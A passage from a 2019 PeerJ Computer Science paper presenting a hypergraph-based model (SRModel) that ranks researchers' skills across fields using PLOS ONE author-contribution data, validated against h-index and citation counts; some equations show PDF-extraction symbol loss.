boundaries between disciplines and resulted in a sharp emergence of many marginal disciplines. It is clear that collaboration cross discipline becomes a trend and this will be more frequent in the future. Take PLOS ONE journal, for example; we extracted the disciplines of the PLOS ONE paper on their website, and the statistics of those 177,147 papers are shown in Fig. 1. There are only 1,843 papers in a single field, and a large number of papers cross 2–4 fields. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 3/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Figure 1 The distribution of number of fields for all the papers. Full-size DOI: 10.7717/peerjcs.182/fig-1 It has been found that collaborations cross disciplines have brought many competitive and high-quality outputs (Yegros-Yegros, Rafols & D’Este, 2015; Nicolini, Mengis & Swan, 2012). First, the development of the collaborative relationships between multi-disciplines makes researchers realize the advantages of resource sharing, which can make a better data and knowledge utilization either within a team or in the whole society. The efficiency and outputs of the team are also improved under the cross-disciplinary scenario. Second, cross-disciplinary collaboration can bring creative ideas to researchers and produce more novel outputs for teams. Researchers from different fields get strong support from other disciplines during collaboration and discussion. They are more likely to discover valuable problems and create significant innovations because they have less limitation than those who collaborate with researchers in the same field. As cross-disciplinary cooperation has become a trend in academia, discipline is one of the most important factors when considering team-related problems. Researchers can learn and use skills of several disciplines in a cross-disciplinary work, which involves knowledge of more than one discipline. However, scientific research varies in different fields, and skills required by each field are diverse. One kind of skill can be different in different fields or disciplines. For example, the skill ‘‘experiment’’ in computer science is totally different from that in biology and chemistry, while another skill ‘‘paper writing’’ is more similar between various disciplines or fields. Thus, the skill in different fields has both common features and uniqueness. The diversity of fields and disciplines should be taken into consideration while evaluating researchers’ skills. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 4/22 https://peerj.com https://doi.org/10.7717/peerjcs.182/fig-1 http://dx.doi.org/10.7717/peerj-cs.182 After taking discipline as an important factor in skill ranking problem, we have two questions: (i) in what aspects it may influence the skill ranking and (ii) how can we quantify a skill’s ranking? Firstly, we consider the importance of a skill in a field, which indicates the relevance of skills in each field. As discussed above, the significance of the same skill in different fields varies, which is caused by discipline diversity and speciality. Here we suppose that the more frequently a skill is used in a field, the more important it is in that field. Thus, we use the rank of times that a skill has been used in a field to quantify its importance in that field. Secondly, a researcher always masters multiple skills, and the proficiency of each skill is not equal as well. As a common sense, the more frequently people use a skill, the more proficient they are in it, that is ‘‘Skill comes from practice’’. This indicates that the times a researcher use a skill in works are correlated to the skill’s ranking. Similarly, we use the rank of times that researchers use a given skill in their works to denote skill’s importance to researchers. Besides, the familiarity of researchers with a certain research field is also vital for ranking skills of researchers in different fields. This feature is quantified by the rank of number of papers that a researcher published in a given field. The more papers a researcher has published in a field, the more familiar he/she is with that field. Thus, they can perform better and show a higher skill proficiency more easily. According to the above analysis, in order to rank researchers’ skill, field information needs to be taken into consideration. Importance of a skill in a field, a researcher’s proficiency of each skill, and the familiarity of a researcher in a field can influence the ranking level of a skill. Considering those factors, we propose a novel model to rank researchers’ skill. MODEL This section describes the definition of skill ranking and the concept of hypergraph. We describe our Skill Ranking Model (SRModel) based on the hypergraph in detail. Problem definition We define the skill ranking problem as follow: given a complex network H = (V,E,w), where V denotes the vertices, including researchers, fields and skills in our model, E denotes different types of edges, and w denotes weight of the edges. Skills indicate the ability a researcher got when he/she took part in some real works. Skill ranking problem is to evaluate a researcher’s specific skill in a specific field by ranking methods. It is unconvincing to consider only the pairwise relationship between the researcher and the skill in skill ranking problem. It would be more convincing to take account of three factors. These three factors can be integrated into three kinds of relationships, including relationships between researchers and skills, researchers and fields, fields and skills. In this paper, we use the hypergraph to represent a high order relationship, which is a generation of simple network. A hypergraph can be used to represent the relationships and interactions of two or more nodes. For example, in the citation network, a paper and its reference papers can compose a hyperedge. In music recommendation problem (Theodoridis, Kotropoulos & Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 5/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Panagakis, 2013; Bu et al., 2010), a user and the music he/she listened along with the music lists compose a hyperedge. Similar problems, such as movie recommendation, interest recommendation (Yao et al., 2016), news recommendation (Liu & Dolan, 2010; Li & Li, 2013), image retrieval (Huang et al., 2010; Yu, Tao & Wang, 2012), user rating (Suo et al., 2015), scientific ranking (Liang & Jiang, 2016), can be solved based on the hypergraph framework. Experiments show hypergraph methods are powerful and efficient to model multi-relationship systems. In a hypergraph, an edge, called hyperedge, contains arbitrary number of nodes, rather than pair of nodes in ordinary graphs (Huang et al., 2010). A hypergraph is a group of H =(X,E) where X is a set of vertices and hyperedge E is a set of non-empty subsets of X. In our study, node set X is consisted of researcher set R, field set F and skill set S. Each hyperedge includes a researcher, a field and a skill, denoting the ternary relation among them. SRModel Our SRModel aims at ranking individual’s different skills using hypergraph model. We consider three kinds of objects and their relations in the model. The objects include researchers, fields and skills, forming the vertex set of the heterogeneous network. In this network, there are three-ary relations between skills, researchers and fields so that normal network structure cannot provide effective representation of this system. In this paper, we use a hypergraph to model the three-ary relations. To construct the hypergraph model, we build a weighted heterogeneous network to calculate the weights of edges first, denoted as H =(V,E,w), where V =R∪F∪S denotes the set of vertices and E ={e|(vi,vj),i 6= j} denotes the edge set. A simple example of a part of our heterogeneous network is showed in Fig. 2A. Vertex set includes three kinds of vertices, i.e., researcher vr, field vf and skill vs. Edge set E includes three kinds of edges, i.e., edges between researchers and fields, researchers and skills, fields and skills. To understand the network clearly, the heterogeneous network can be regarded as a ‘‘tripartite network’’, whose vertices can be divided into three independent and unconnected node sets R, F and S. And each edge e(i,j) in network connects vertices i and j in different node sets. There are three types of edges indicating pairwise relationship between different types of nodes. To quantify the importance of the pairwise relationship, we set each kind of edge a weight to express the importance of a node to the other, which is calculated by the ranking of node’s attribute among the others in the same set. One of the three types of edges is e(vsj ,v f i ) between field i and skill j. The weight between a skill and a field is calculated by the percentile ranking of the skill in the field: W1(v s j ,v f i )=1−γ sf ji /L sf i , (1) where γ sfji denotes the ranking of the skill j that used in field i, which is calculated by ranking skills according to the times they are used in a field. Lsfi is the number of skills that used in the field i. We use the percentile ranking as the normalization to eliminate the influence of different number of skills in different fields. Besides, we subtract 1 from γ sfji to make the minimum weight not equal to zero. For example, suppose there are four skills in Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 6/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 skill ii skill j field a field bfield c skill i skill j field a field bfield c BA Figure 2 Example of our model. (A) A simple example of a heterogeneous network containing six ver- tices and 10 hybrid edges. (B) An example of our SRModel, which is built based on the hyperedges. For the relationships between researcher, field and skill, a hyperedge exists only if the researcher process the skill in this field. Full-size DOI: 10.7717/peerjcs.182/fig-2 a field and their ranks are 1, 2, 3 and 4. The weights between those four skills and this field are 1.0, 0.75, 0.5 and 0.25, respectively. Weight of edge e(vrk,v f i ) between researcher k and field i can be regarded as the importance of the researcher in the field, which is calculated by: W2(v r k,v f i )=1− √ (γ rfki −1)/L rf i , (2) where γ rfki denotes the ranking of researcher k in field i, which is calculated by ranking researchers according to the numbers of previous works that they have participated in a field. Lrfi is the total number of researchers in field i. Researchers get experience and knowledge of a field when they take part in works in this field. The more works they have done, the more they learned. We perform normalization by using the percentile ranking to eliminate the influence of different number of researchers in different fields, like in Eq. (1). There are differences between Eqs. (2) and (1) because we use the square root to re-scale the weight in Eq. (2). The re-scaling operation is to make the distribution of the weight wider because there are many researchers rank in the tail (a large number of beginners). For example, suppose a field m has five experts, and they have published 5, 3, 3, 1, 1 papers in this field respectively. Thus, the weights between those five experts and field m are 1.0, 0.553, 0.553, 0.225, 0.225, respectively. Similarly, weight of edge e(vrk,v s j ) between researcher k and skill j represents how important a researcher is in a given skill, computed by: W3(v r k,v s j )=1− √ (γ rskj −1)/L rs j , (3) where γ rskj denotes the ranking of researcher k with skill j, which is calculated by ranking researchers according to the times they used this skill in their previous works. Lrsj denotes the number of researchers with skill j. A hypergraph Hh =(X,Eh,wh) is built after constructing the heterogeneous network and calculating the weights of edges. A hypergraph built on the heterogeneous network Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 7/22 https://peerj.com https://doi.org/10.7717/peerjcs.182/fig-2 http://dx.doi.org/10.7717/peerj-cs.182 in Fig. 2A is demonstrated in Fig. 2B. In Hh, X is a set of hybrid nodes, composed by researcher, skill and field. Eh is hyperedge on X, and wh is a weight function of hyperedge. For the relationships between researcher, field and skill, a hyperedge exists only if the researcher processes the skill in this field. We define the weight function of hyperedge inspired by the Laplace kernel function, and the distance calculation method in (Huang et al., 2010). The weight function is: W (vrk,v f i ,v s j )=e 2 ,and (4) 2= W1(vsj ,v f i ) 2·W1 + W2(vrk,v f i ) 2·W2 + W3(vrk,v s j ) 2·W3 , (5) where W1,W2 and W3 are the average edge weights between fields and skills, researchers and fields, researchers and skills, respectively. Based on the above definition and introduction, our SRModel has been formulated. The value of skill ranking of a researcher is calculated by the weight of the hyperedge in the hypergraph. EXPERIMENT SETTING In this section, we introduce the dataset we used in our experiment. Then, we construct the hypergraph and get the skill sets as well as the skill ranking of researchers. Dataset construction Previous studies on researcher evaluation usually use datasets of publications to evaluate their methods. These datasets include Digital Bibliography & Library Project (DBLP), American Physical Society (APS), Microsoft Academic Graph (MAG). However, authors’ skills are unavailable in those prevalent datasets. In the previous work where skills are required, such as team formation problem, team member replacement, collaborators recommendation, researchers usually use terms extracted from keywords, title (Farhadi et al., 2011) or conference and journal name (Li et al., 2017) instead of authors’ real skills. Either terms in titles or journal names have limitations to reflect skills of researchers, because the division of the work is not clear. However, there are several journals providing authors’ contribution statement, such as the British Medical Journal, Nature, Lancet. Besides, journals such as the FEBS Journal and PLOS journals require authors to declare their contributions in a specified format while submitting the paper. We create a dataset by crawling papers’ information together with their research fields and authors’ individual contributions from the PLOS ONE journal website to validate our model, as we mentioned in the Background section. PLOS ONE journal is an open-access journal, so we can extract information from their website by parsing their HTML pages of each paper with Python. The contribution information of this journal has been used to analyze the authors’ contribution pattern recently (Corrêa Jr. et al., 2017; Sauermann & Haeussler, 2017). The details of our dataset are shown in Table 1. At first, we remove papers with incomplete information. In the raw dataset, 28,748 kinds of contributions are found, and most of them have similar meanings. PLOS journals recently adopted the CRediT Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 8/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Table 1 Selected PLOS ONE dataset. Items Raw Preprocessed Time Span 2006-2017.07 2006-2017.07 # field 11 11 # paper 182,007 164,543 # author 676,852 684,844 # contribution 28,748 10 Taxonomy providing standardized and fine-grained information of authors’ contribution (Atkins, 2016), but there are no standard rules for naming paper’s contributions in the early years. Using the raw contribution directly may bring inaccuracy. There are 100 items appearing more than 40 times accounting for the vast majority (about 96%). Thus, we cluster 100 kinds of contributions that appear frequently into 10 categories manually. The categories are shown in Table 2. Here, we regard these 10 categories of contributions as skills of researchers. The acronyms of authors’ name followed the contributions on the PLOS ONE web pages. We match the acronyms up with authors’ full name in author list of each paper. Then we get the authors’ skills in every paper. Another vital step is name disambiguation. Multiple authors may share the same name, and there is no unique identifier for each author in PLOS ONE journal. It can cause confusion and even fault if we regard those authors with the same name as one person. Many works have employed a variety of features to distinguish authors sharing the same name, such as affiliations, coauthors, topics or research interests (Kang et al., 2009; Ferreira, Gonçalves & Laender, 2012). To distinguish authors in PLOS ONE dataset, the following features are adopted: (i) Affiliation: authors with the same name and the same affiliation are regarded as the same authors; (ii) Coauthor: if two authors M1 and M2 with the same name coauthored one or more papers with a third author N , it is likely that M1 and M2 are the same author named M. We combine these two features to disambiguate the authors’ name. There are 676,852 authors in the raw dataset, and 684,844 authors after naming disambiguation. Network construction To construct the SRModel framework using PLOS ONE dataset, our experiment consists of four main parts as follows. 1. Construct a heterogeneous network with three kinds of vertices and three kinds of edges. 2. Compute edge weights according to Eqs(1)–(3). 3. Build a hypergraph Hh=(X,Eh,wh) and compute hyperedge weights using Eq. (4). 4. Calculate the researchers’ yearly skill ranking W i from 2006 to 2016 respectively. In the first step, we construct a heterogeneous network including three kinds of vertices and three kinds of relationships. Edge between researcher and field/skill exists only if he/she published paper in this field or used this skill at least once. A vertex denoting field vfi and a vertex denoting skill vsj are connected if one or more papers in field i use skill j. There are Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 9/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Table 2 The 10 skills and their composed contributions. Skills Contributions in PLOS ONE dataset Data analysis Analyzed the data, Data curation, Statistical analysis, Interpretation of data, Interpreted the data, Data interpretation, Interpreted data, Analysis and interpretation of data, Performed statistical analysis, Interpretation of the data, Performed the statistical analysis Study and experiments design Conceived and designed the experiments, Designed the study, Conceived and designed the study, Designed the experiments, Conceived the study Experiment performing Performed the experiments,Visualization, Performed the experiments Paper writing Wrote the paper, Writing original draft, Wrote the manuscript, Contributed to the writing of the manuscript, Writing - original draft, Drafted the manuscript, Wrote the first draft of the manuscript Software and tools Contributed reagents/materials/analysis tools, Software, Designed the software used in analysis, Contributed reagents/materials/analysis tools Theory analysis Methodology, Conceptualization, Formal analysis, Validation, Interpreted the results, Interpretation of results Paper reviewing Writing review & editing, Revised the manuscript, Writing - review & editing, Edited the manuscript, Read and approved the final manuscript, Reviewed the manuscript, Critically revised the manuscript, Final approval of the version to be published, etc. 44 items in total Data collection Investigation, Resources, Acquisition of data, Data collection, Collected the data, Collected data, Obtained permission for use of cell line, Sample collection, Data acquisition, Data acquisition, Collected samples, Collected the samples Supervision Supervision, Project administration, Study supervision, Supervised the study, Supervised the project, Supervised the work Funding acquisition Funding acquisition, Obtained funding, Financial support 684,844 authors, 11 fields and 10 skills in the heterogeneous network, forming 2,758,522 edges in total. In the second step, we compute the weights of edges in the constructed network. We compute the weights of field-skill, researcher-field and researcher-skill by Eqs. (1)–(3), respectively. We rank the skills in field i by the numbers of papers in field i that using the skills, and for each skill j the ranking is denoted as γ sfji . L sf i is the total number skills in field i. When calculating the weights between researchers and fields, we assume the more paper a researcher published in a field, the more he/she is familiar with the field. Thus, we rank the researchers according to the numbers of papers they published in field i, and for researcher k the ranking is denoted as γ rfki . Let the total number of researchers in field i as Lrfi in Eq. (2). Similarly, γ rs kj is the ranking of researcher k using skill j by the number of Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 10/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Algorithm 1: Algorithm to calculate the skill ranking of researchers Input: Weight of edges; paper information Output: Hyperedge weights 1 W 1=AVG(skills,fields); 2 W 2=AVG(researchers,fields); 3 W 3=AVG(researchers,skills); 4 hyperedges= list(); 5 hyperWeight =dict(); 6 for paper in dataset do 7 add (researcher, field, skill) to hyperedges; 8 for (r,f ,s) in hyperedges do 9 2= w1[s,f ] 2·W1 + w2[r,f ] 2·W2 + w3[r,s] 2·W3 ; 10 weight =e2; 11 hyperWeight[r,f ,s]=weight; 12 return hyperWeight; papers he published using this skill, and Lrsj is the total number of researchers that using skill j in Eq. (3). In the third step, we construct the hypergraph and calculate the skill proficiency of authors. A hyperedge connects a researcher, field and skill if the researcher published papers in this field using this skill. There are 9,501,866 hyperedges in the constructed hypergraph in total. And the weight of hyperedge is calculated by Eq. (4), representing a researcher’s skill proficiency in a field. The pseudo code of the algorithm to calculate the skill ranking is shown in Algorithm 1. Let E denote the number of hyperedges, so the time complexity of constructing a heterogeneous network of skill, field and researcher is O(E). Then, building hypergraph based on the network and calculating weights of hyperedges can be performed together. The time complexity of these two steps is also O(E). So the overall time complexity of our skill ranking method is O(E). In fact, the skill ranking that we calculate in the third step is a snapshot at the time when the data are collected. In the last step, we take a snapshot every year to construct a series of hypergraphs and calculate the weights of hyperedges to represent the researchers’ skill rankings at different time, denoted as W i, where i∈[2006,2016]. That is, the skill ranking of the researcher in a field at year i is calculated by all the papers he published until year i. We use the yearly skill ranking information to analyze the dynamic of researchers’ skill proficiency. Also, we can get the researchers’ abilities in the year when the paper was published. RESULT We construct the hypergraph model and then calculate the weight of the hyperedge using it. Based on the hyperedge weight, we can calculate the skill ranking of a researcher in a Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 11/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Table 3 Correlation coefficient of skill ranking and h-index Skill Correlation coefficient Experiment performing 0.7717 Data analysis 0.8036 Paper reviewing 0.7013 Paper writing 0.801 Supervision 0.5561 Theory analysis 0.5177 Funding acquisition 0.7582 Software and tools 0.7822 Study and experiments design 0.8155 Data collection 0.6173 field. In this section, we validate the effectiveness of the SRModel and carry out several analyses on the ranking results. Validation of SRModel We computed the correlation coefficient between researchers’ skill ranking and their h-index and performed a hypothesis test to validate our model’s performance. Correlation between skill ranking and h-index To verify the validity of the method, and explore the potential relationship between skill ranking and h-index, we analyze how skill ranking changes with the increase of h-index. PLOS One is a journal mainly focusing on biology. Among the 182,007 papers that we obtained in their website, more than 169,150 papers are in the field of biology. Thus, we use the papers and authors in biology to perform the verification. Researchers’ skill rankings are calculated by the data in PLOS One. But only a fraction of researchers’ papers is published in this journal. It is not reasonable to use authors’ real h-indices to analyze the relationship with their skill rankings. Thus, we calculate the h-indices of all the authors in PLOS ONE dataset according to the papers they published in this journal and their citation counts. The h-indices of authors in PLOS One dataset range from 0 to 32. Pearson’s correlation coefficient quantifies the linear correlation between two groups of continuous variables (Pearson, 1895). Thus, we calculate the correlation coefficient between skill ranking and h-index, shown in Table 3. We notice that all the correlation coefficients are larger than 0.5, especially for the skill ‘‘Data analysis’’, ‘‘Paper writing’’ and ‘‘Study and experiments design’’, of which the correlation coefficients are larger than 0.8, which indicates a high correlation. This result means that a researcher with a higher h-index often has a higher skill ranking, which suggests that if a researcher is more skillful with academic skills, they can obtain outcomes with higher quality. We then analyze the distribution of skill ranking to prove the rationality of the model. The result is shown in Fig. 3. Both of two distribution curves subject to exponential distribution of function y =ea+bx+cx 2 , and the R-square of these two fitting functions is close to 1, which indicates the fitting degree is high. It means that researchers’ h-index and Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 12/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 Figure 3 Distributions and fitted lines of h-index (R2 = 0.99) and skill ranking (R2 = 0.97). The x axes denote the value of h-index and skill ranking, and y axes denote the numbers. Both h-index and skill rank- ing are subject to exponential distribution. Full-size DOI: 10.7717/peerjcs.182/fig-3 skill ranking have the same kind of distribution, which also explains the high correlation coefficient between them and the rationality of the SRModel. Relationship between skill ranking and citation To validate whether the skill ranking computed by our model is significant for the quality of scholar’s research outputs, we define a hypothesis that there are differences between the citation counts of papers whose authors’ average skill rankings are different. We use the single side t-test, which is also known as ‘‘student test’’ (Gosset, 1908), to test the hypothesis we made. In our experiments, we use papers in biology from 2009 to 2015 as the sample set. Here, firstly we group all papers by their publish years because the citation is highly influenced by paper’s age and we just have the citation counts of paper in We remove the first three years because we don’t have enough papers and researchers in our dataset, and we remove the last two year because the citation counts of these papers are still growing. Then, we calculate the average skill ranking of paper’s authors in the year they wrote it for each paper. We split every group into two parts to perform our test. The one consists of papers with authors average skill ranking less than the median value of the group. The other contains the rest of papers. We denote the part of papers with higher authors’ skill ranking as random variable X1 and the lower papers as X2. We perform a t-test with the settings mentioned before. The null hypothesis for testing is H0 :µ1 =µ2 and alternative hypothesis as H1 :µ1 >µ2, where µ1 and µ2 are the mean values of the population of the two groups of random variables we defined above. We use the SciPy module in Python to do the test (Jones, Oliphant & Peterson, 2001), which can compute both the statistical value and p-value of the t-test together by function scipy.stats.ttest_ind(X1,X2,equal_var =True). If the p-value is less than a significance level (typically 0.05), we can reject the null hypothesis and hold the alternative hypothesis H1 :µ1 >µ2, which means the average citation of papers with higher skill ranking authors are more than papers with authors Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 13/22 https://peerj.com https://doi.org/10.7717/peerjcs.182/fig-3 http://dx.doi.org/10.7717/peerj-cs.182 Table 4 Average citation counts of two groups of samples and their p-value. Year Avg-low Avg-high p-value 2009 37.5 42.0 7.2×10−4 2010 31.2 36.0 7.0×10−5 2011 24.8 27.5 2.3×10−6 2012 18.5 20.4 1.6×10−11 2013 13.3 14.7 1.9×10−14 2014 9.0 9.9 1.2×10−13 2015 4.8 5.3 7.7×10−13 lower skill ranking. But the result of t-test is sensitive to the equality of samples variance. If variances of two groups of samples are not equal, the result needs to be corrected. So before performing the t-test on samples, we do a Levene’s test to assess the equality of two groups of variances. If the two variables are not equal, we need to set the parameter equal_val = False in the t-test function to avoid deviation. The average citation counts of two groups of samples are shown in Table 4. Papers written by authors with relatively low skill ranking have lower average citation counts. All the p-values in t-test are lower than 0.05, which indicates there are significant differences in sample mean values. Thus, the skill ranking of authors influence the citation counts of outputs. Analysis of skill ranking increase We define the researcher’s academic age in PLOS ONE dataset as the number of years between his first paper and the last paper in this dataset. Although PLOS ONE is a comprehensive journal with a large number of papers, it cannot include all the papers published by every researcher. There still exist many researchers that published many papers but only one or two in this journal. Analyzing the skill rankings of those researchers is meaningless. In order to avoid the defect of the dataset as much as possible, we choose researchers whose academic ages and numbers of published papers are both in the top 10% respectively, named as ‘‘top researchers’’, to carry out the analysis. In the PLOS ONE dataset, there are 26,978 ‘‘top researcher’’. We first calculate the yearly change rate of researchers’ skill ranking. The yearly change rate indicates that how much the skill ranking of a researcher increased or decreased compared to that in one year before, defined as 1i= Wi−Wi−1 Wi−1 , where Wi is the value of skill ranking in year i and Wi−1 6=0. We show the distribution of yearly change rate between 0 to 100% in Fig. 4. The change rate of most researchers’ skills is less than 20%. The green bar demonstrates a slight decrease existing in the researchers’ skill ranking, because the progress of other researchers decreases the rankings of them. Observing the curve of researchers’ skills, we found the skills of most researchers are fluctuating upward, but the rising patterns are different. Then, we explore the commonalities and differences of the changes for researchers’ different skills. First, we analyze the rising stages of skills. When a researcher’s skill ranking increased more than 20 % in a year, we call this year a ‘‘fast increase year’’ for his skill. The distribution of the longest continuous rapid growth years of each set of researcher-field-skill is presented Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 14/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 C ha ng e R at e Number of Researcher-field-skill Pairs 0-9% 10-19% 20-29% 30-39% 40-49% 50-59% 60-69% 70-79% 80-89% 90-99% >100% 0k 100k 200k 300k 400k 1,200k 1,300k Figure 4 Yearly change rate of top researchers’ skills. The x-axis is the number of researcher-field-skill pairs and the y-axis is the change rate. Red and blue bars denote the number of increase and decrease sets with the corresponding change rate in y-axis, respectively. Full-size DOI: 10.7717/peerjcs.182/fig-4 in Fig. 5. In Fig. 5, we count the total number of researcher-field-skill sets for different length of time. About 434 thousand researcher-field-skill sets experience one-year rapid growth, and the number of that for two years reduced to around 220 thousand. A few skill sets rise continuously more than five years, including 1,254 sets for 5 years and 53 sets for 6 years. The average fast-growing years among the 730,789 researcher-field-skill sets for 26,798 researchers is 1.5 years. That is, it is generally for researchers to spend one or two years putting their energy on one skill to have a good command of it, and then they may focus on other disciplines or other skills. Several reasons account for this phenomenon. First, researchers usually change their research fields in their research careers, especially for those interdisciplinary researchers. The transformation of fields can bring researchers more inspiration and creativity. Second, for a researcher, as he becomes more and more skillful, the work he undertakes in the team may change. We then explore the skill transfer of researchers. Changing patterns of skill ranking Then, we explore the changing patterns of different skills. To investigate how skill ranking changes over time, we propose a method to count the average ranking for each skill in different periods. There are three problems needing to be considered. (1) Researchers’ academic ages are different, and the time when they enroll in a skill or field varies. (2) Many researchers didn’t publish paper on PLOS ONE at the beginning of their academic career. Studying the skill transfer of them is unconvincing. (3) Many researchers didn’t publish papers every year in PLOS ONE and the numbers of paper published by researchers are totally different. To solve these problems, we define a researcher’s ‘‘academic stage’’ as the period between years he has published papers. For example, a researcher m published two, five and one papers in 2013, 2015 and 2016, respectively, so he has three academic Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 15/22 https://peerj.com https://doi.org/10.7717/peerjcs.182/fig-4 http://dx.doi.org/10.7717/peerj-cs.182 Figure 5 Continuous rapid growth years of researchers’ skills. The x-axis denotes the continuous rapid growth years and y-axis denotes the number of researchers’ skills. There are 730,789 pairs of (researcher, field, skill) for the 26,978 top researchers in total. Full-size DOI: 10.7717/peerjcs.182/fig-5 stages, which are 2013–2014, 2015–2015, 2016–2016. The skill ranking of each stage is indicated by the skill ranking in the first year of the stage. After we got the skill ranking of all the stages for all the top researchers, we calculate the average value in each stage for different skills, and show the result in Fig. 6. We divide the skills into four groups according to their trend. In Fig. 6A we notice that there are five skills of which the ranking keep increasing throughout all academic stage, and the increase rate is higher than other groups, including ‘‘paper writing’’, ‘‘data analysis’’, ‘‘study and experiments design’’, ‘‘experiment performing’’ and ‘‘software and tools’’. It suggests that these five skills are the basic academic skills so that they are important for many researchers throughout their academic careers. The second group, as shown in Fig. 6B, has two skills, ‘‘supervision’’ and ‘‘theory analysis’’. The rankings of these two skills change slowly in the early stages and have a sharp increase at the latter academic stages, which indicates that these two skills need more experience in academia and are harder to develop. Figure 6C is the third group of skills, including ‘‘paper reviewing’’ and ‘‘data collection’’. These two skills’ ranking rise in the early stage and finally falling slightly, especially the skill ‘‘data collection’’, whose increase rate is very small after the fourth stage. We assume that these two skills are easy to get started, and when researchers have more experience they will not use these skills frequently. There is one skill in Fig. 6D, the trend of which is not so obvious. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 16/22 https://peerj.com https://doi.org/10.7717/peerjcs.182/fig-5 http://dx.doi.org/10.7717/peerj-cs.182 Figure 6 Average skill ranking in different periods. The x-axis is the stage, and y-axis is the researchers’ average skill ranking in each stage. We divide the skills into four groups according to their trends. (A) Ba- sic skills that increase throughout researchers’ academic careers. (B) Skills that need more experience to be developed. (C) Skills that are easy to get started. (D) A skill whose trend is not so obvious. Full-size DOI: 10.7717/peerjcs.182/fig-6 We think ‘‘funding acquisition’’ has little correlation with time in our dataset. Maybe the time span is not long enough to find its changing law. Thus, we find the changing patterns of different skills vary. Some skills are easy to get started. When researchers have more experience, they will transfer their interests to other skills. Some skills are harder to develop, researchers with these skills need to develop other skills first. Thus, they develop these skills in their later academic stage. There are also some basic skills are important for many researchers throughout their academic careers. CONCLUSION AND FUTURE WORK In this paper, we make both empirical analysis and data analysis to figure out factors affecting the result of skill ranking. Then, we construct a model named SRModel based on hypergraph to describe the relationships among researchers, skills and fields. This model can be used to rank a researcher’s scientific skills. We applied our model on the PLOS ONE dataset, which is extracted from the journal website. We obtained the weighted field-skill Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 17/22 https://peerj.com https://doi.org/10.7717/peerjcs.182/fig-6 http://dx.doi.org/10.7717/peerj-cs.182 sets for each researcher. We validated our method by correlation analysis with h-index and hypothesis test. Then, we use the results to analyze the increase of skill ranking and patterns of skill ranking change. Skill ranking can be applied to many practical problems, such as collaborator recommendation, team formation, team member replacement and team refinement. In problems where skill similarity is required, the researcher’s proficiency in each skill can make the results more precise. In other problems where skill grading is needed, a fine-grained method can lead to a better result. In future work, we will use our model to solve some practical problems and examine its reliability and effectiveness. Datasets of other disciplines like software engineering and physics can be taken into consideration to verify the validity of the model. Besides, more factors and relationships will be taken into consideration to rank skills. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Fund for Promoting the Reform of Higher Education by Using Big Data Technology, Energizing Teachers and Students to Explore the Future (2017A01002), the Fundamental Research Funds for the Central Universities (DUT18JC09), Liaoning Provincial Key R&D Guidance Project (2018104021), and the Liaoning Provincial Natural Fund Guidance Plan (20180550011). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Using Big Data Technology, Energizing Teachers and Students to Explore the Future: 2017A01002. Fundamental Research Funds for the Central Universities: DUT18JC09. Liaoning Provincial Key R&D Guidance Project: 2018104021. Liaoning Provincial Natural Fund Guidance Plan: 20180550011. Competing Interests Xiangjie Kong is an Academic Editor for PeerJ. Author Contributions • Xiangjie Kong conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Lei Liu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 18/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182 • Shuo Yu performed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • Andong Yang analyzed the data, authored or reviewed drafts of the paper, approved the final draft. • Xiaomei Bai and Bo Xu conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The raw code are available in the Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.182#supplemental-information. REFERENCES Alvarez-Rodríguez JM, Colomo-Palacios R. 2014. Assessing professional skills in a multi-scale environment by means of graph-based algorithms. In: European network intelligence conference. Piscataway: IEEE, 106–113. Anderson KA. 2017. Skill networks and measures of complex human capital. Pro- ceedings of the National Academy of Sciences of the United States of America 114(48):12720–12724 DOI 10.1073/pnas.1706597114. Atkins H. 2016. Author credit: PLOS and CRediT update. The Official PLOS Blog. Available at https://blogs.plos.org/plos/2016/07/author-credit-plos-and-credit- update/ . Biswal AK. 2013. An absolute index (Ab-index) to measure a researcher’s useful contri- butions and productivity. PLOS ONE 8(12):e84334 DOI 10.1371/journal.pone.0084334. Bornmann L, Daniel HD. 2005. Does the h-index for ranking of scientists really work? Scientometrics 65(3):391–392 DOI 10.1007/s11192-005-0281-4. Bu J, Tan S, Chen 